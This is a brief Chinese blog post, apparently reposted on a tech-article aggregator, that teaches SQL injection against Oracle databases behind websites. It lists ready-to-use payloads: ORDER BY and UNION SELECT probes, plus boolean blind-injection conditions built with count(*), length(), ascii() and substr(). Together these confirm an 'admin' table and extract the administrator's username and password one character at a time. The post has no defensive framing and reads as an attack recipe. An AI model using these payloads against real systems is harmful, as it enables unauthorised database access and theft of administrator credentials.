Oracle注入
2021/9/10 19:06:38
本文主要是介绍Oracle注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
先判断好注入点后
order by 长度
union select 'null',null,null ... from admin 如果在某个地方返回正确了,那么就能在这个注入点注入
推荐看一本书《藏锋者》
字段长度太短的话使用另一种注入方式来注入 在网站后方加入 and (select count(*) from admin)<>0返回正确说明存在该表
判断完成后,再将*换成表名去猜测列名 可以猜测user password等常用列名
and (select count(*) from admin where length(name)>=5)=1 该句用来猜测管理员用户名长度
and (select count(*) from admin where ascii(substr(name,1,1))>=97)=1 ascii用来获取ASCII码值,去判断 97为a
第二个的话改这个数(name,2,1)
判断密码一样是通过把name改成pwd方法一样
这篇关于Oracle注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-10-07fastcgi 是什么-icode9专业技术文章分享
- 2024-10-07fastcgi 的详细使用教程介绍-icode9专业技术文章分享
- 2024-10-07git如何更新单个文件到本地-icode9专业技术文章分享
- 2024-10-07如何使用ASM(Abstract Syntax Tree Manipulation)技术来修改第三方AAR依赖中的函数-icode9专业技术文章分享
- 2024-10-07Activity 跳转时间耗时很长怎么优化解决-icode9专业技术文章分享
- 2024-10-07Androud Toast 有哪些常用的第三方组件-icode9专业技术文章分享
- 2024-10-07在viewmodel中怎么使用 mmkv?-icode9专业技术文章分享
- 2024-10-07MMKV.defaultMMKV() 是单例模式吗?-icode9专业技术文章分享
- 2024-10-04el-table 开启定时器下,表格的选中状态会消失是什么原因-icode9专业技术文章分享
- 2024-10-03如何安装和初始化飞牛私有云 fnOS?-icode9专业技术文章分享